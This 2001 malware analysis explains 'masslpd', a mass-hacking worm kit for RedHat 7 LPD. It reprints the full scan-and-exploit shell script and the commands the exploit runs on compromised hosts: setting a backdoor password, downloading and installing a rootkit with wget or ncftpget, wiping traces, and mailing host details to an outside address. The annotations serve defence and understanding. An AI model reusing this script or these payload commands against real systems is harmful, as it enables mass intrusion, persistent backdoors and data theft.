Date of Analyse : 30/05/01
Author : Fredrik Ostergren [ press@alldas.de ]
Description: Automatic tool to mass-hack computers using the lpd exploit for RedHat 7. 

(As always, comments are in "[ ]")

-----[ Disclaimer 

Information revealed in this and other analysis are in no way made to contribute illegal actions
such as hacking or other forms of computer crimes. They should serve as informative sources
to prevent actions like mentioned before.

-----[ Introduction

Some time ago a trend called "mass-hacking" entered the community of blackhats.
People were lazy or just greedy. They wanted access to as many computers
that they could get. 

The compromised computers are often used to packetnets, botnets or other things that might destroy
the innocent peoples activities. Not to mention all the administrators that get penetrated
automaticly. Worm's and mass-hackers have existed for a long time, it's not until now the media
and other organizations write about them. The last "sensation" was the sadmind./IIS 'worm'. 

Information is the best way to protect evilness. The analysis section will try to bring understanding to
you as a normal user. Enjoy!

fredrik@slaptop:~/analys/masslpd$ ls -al
total 56
drwxr-xr-x   2 fredrik  users        4096 Feb 23 20:42 ./
drwxr-xr-x   3 fredrik  users        4096 May 28 21:51 ../
-rwxr-xr-x   1 fredrik  users        1491 Feb 23 20:08 masslpd*
-rw-r--r--   1 fredrik  users       12091 Feb 27 11:01 overlpd.c
-rwxr-xr-x   1 fredrik  users       30436 Feb  8 08:38 scan*

md5sum output -

b63c0536b1a1adc76a636c5421513a20  masslpd
2bc0739181e52cc6caed8c7c3d0bd745  overlpd.c
589c2b643a7b1eb706cb4556930933fc  scan

-----[ Main

The executable file called 'scan' is a pre-compiled version of the famous network scanner called synscan by 
psychoid (source available here : http://www.psychoid.lam3rz.de/synscan1.6.tar.gz).

The output from it looks like this

fredrik@slaptop:~/analys/masslpd$ ./scan

SynScan 1.6 by psychoid/tCl

Usage: ./scan 1[.2[.3[.4]]]|infile outfile device(=ppp0/eth0) delay [port[,port,port-port...]]
delay depends on your connection speed. dialup = 500, t1 = 100, t3 = 50..

ports may be port,port,port also, port-port,port-port
port,port,port scans subnets at the ports given, port-port scans each host from port to port

infile must be List of numerical ips

Results will be in outfile.port (e.g. if you scan port 12345, in outfile.12345

fredrik@slaptop:~/analys/masslpd$

As you see this scanner can scan ips from an ipfile or class a/b/c blocks based on the command-line
options. The user is also able to specify delay for each scanned host, device being used and port-ranges.

This is the scanner which will try to find vulnerable hosts by scanning on port 515 (printer port).

[ masslpd ]

#!/bin/sh
#
# masslpd v1.0 by overkill                            [ author takes credit ]
#
# Usage: ./masslpd 208 &					     [ how to use this tool ]
#

cl="^[[0m"							     [ color codes ]
cyn="^[[36m"
wht="^[[37m"
hblk="^[[1;30m"
hgrn="^[[1;32m"
hcyn="^[[1;36m"
hwht="^[[1;37m"

echo
echo "${cl}${cyn}-=${cl}${hblk}[${cl}${hgrn}masslpd by overkill${cl}${hblk}]${cl}${cyn}=-${cl}${wht}"
echo

if [ "$1" = "" ] || [ ! $1 -le 255 ] || [ $1 -le 1 ] ; then	     [ if no arguments are given it displays a help dialog ]
 echo "Usage: ${cl}${hwht}$0 208 &${cl}${wht}"
 exit 0
fi

if [ ! -x ./scan ] || [ ! -f ./overlpd.c ]; then		     [ if scan isn't executable or overlpd.c exists he kills 
the application ]
 echo "One of the programs was not found"
 exit 0
fi

if [ ! -x ./overlpd ]; then					     [ if an executable version of overlpd doesn't exist he 
creates one ]
 make overlpd
fi

bbb=0
limit=255

echo "${cl}${hwht}Starting...${cl}${wht}"
echo

# We'll scan each of the B-subclasses one at a time, and not all the A-class
# ip.. this will increase the chance of your mass exploiter to produce some
# results even if (heaven forbid!) it might get killed at some point
#
# Due to a bug in synscanner's fork, when it ends scanning a B subclass,
# it won't exit on some systems, so the script can't continue. If this
# happens on your shell, add a crontab entry that looks like this:
# 0 * * * * killall -9 scan >/dev/null 2>&1

while [ $bbb -le $limit ]; do
 echo "${cl}${hgrn}Scanning $1.$bbb class..${cl}${wht}"
 ./scan $1.$bbb log eth0 50 515					     [ start the scan using delay 50 and on port 515, will 
output to the file 'log' ]
 echo
 if [ -f log ]; then
  cat log|while read line; do ip=$(echo $line|awk -F"(" '{print $1}'); if [ "$ip" ]; then echo "${cl}${hwht}Trying 
$ip...${cl}${wht}"; ./overlpd $ip brute -t 0; echo; fi; done      [ sorting the log file to be processed by the exploit ]
 fi
 rm -f log	      						  [ removes evidence ]
 bbb=$[$bbb + 1]						  [ increase the rest of the blocks to scan ]
done

# Go check yer mail d00d					  [ script done ]

[ end of masslpd ]

[ overlpd.c ]

The most interesting thing in the overlpd.c file is the part when it sends the commands to be processes on the 
penetrated host. This is a normal lpd remote exploit for redhat 7.0 made by SEClpd. However, It's modified
with the following commands to fit in this autohacker / worm (sadly we do not have a copy of the rootkit) :

unset HISTFILE; cd /tmp; echo %s > stuff; hostname -f >> stuff; cat /etc/redhat-release >> stuff 2>>stuff; uname -a >> stuff"         
[ <= this will gather all information about the remote host and email it ]

"id >> stuff; echo >> stuff; free|grep Mem >> stuff; df >> stuff; echo >> stuff; ping -c 6 yahoo.com >> stuff"           [ same as above....]

"echo >> stuff; echo operator|passwd --stdin operator >> stuff 2>>stuff"
"echo operator:operator|chpasswd >>stuff 2>>stuff"
"if [ -x /usr/bin/ncftpget ]; then ncftpget %s . /pub/.../rh7.tgz >/dev/null 2>&1; else if [ -x /usr/bin/wget ]; then wget 
ftp://%s/pub/.../rh7.tgz >/dev/null 2>&1; else echo no ncftpget/wget found >> stuff; fi; fi; ", [ %s represent the host to get rootkit from]

"echo >> stuff; tar -xzf rh7.tgz >> stuff 2>>stuff; cd rh7; ./install >>../stuff 2>>../stuff; cat install.log >> ../stuff"      
[ <= unpacks and installs the rootkit for redhat 7 ]

"cd ..; rm -rf rh7*"							[ removing all traces ]

"cd /tmp; cat stuff|mail -s 'new root' %s"			        [ mails the computer information to the address specified in %s ]

"rm -f stuff"															      
[ removes the information gathered ]

[ end of parts of overlpd.c ]

-----[ File summary

masslpd		=	the startup script, usage : ./masslpd .
overlpd.c	= 	the source code for the modified seclpd remote exploit.
scan		= 	executable binary of synscan 1.6 by psychoid.

-----[ Conclusion

A worm/mass-hacker can create very big damage. As always insecurity is a real problem world-wide and tools like this 
show us the weakness in our computer systems. However, they are not allowed to be a part of the internet society as
the damage they can cause are devastating. Feedback and comments to all my analysis are welcome, I hope this one made
a difference and helped you to understand what a tool such as this mass-hacker are capable to do.

Fredrik Östergren
press@alldas.de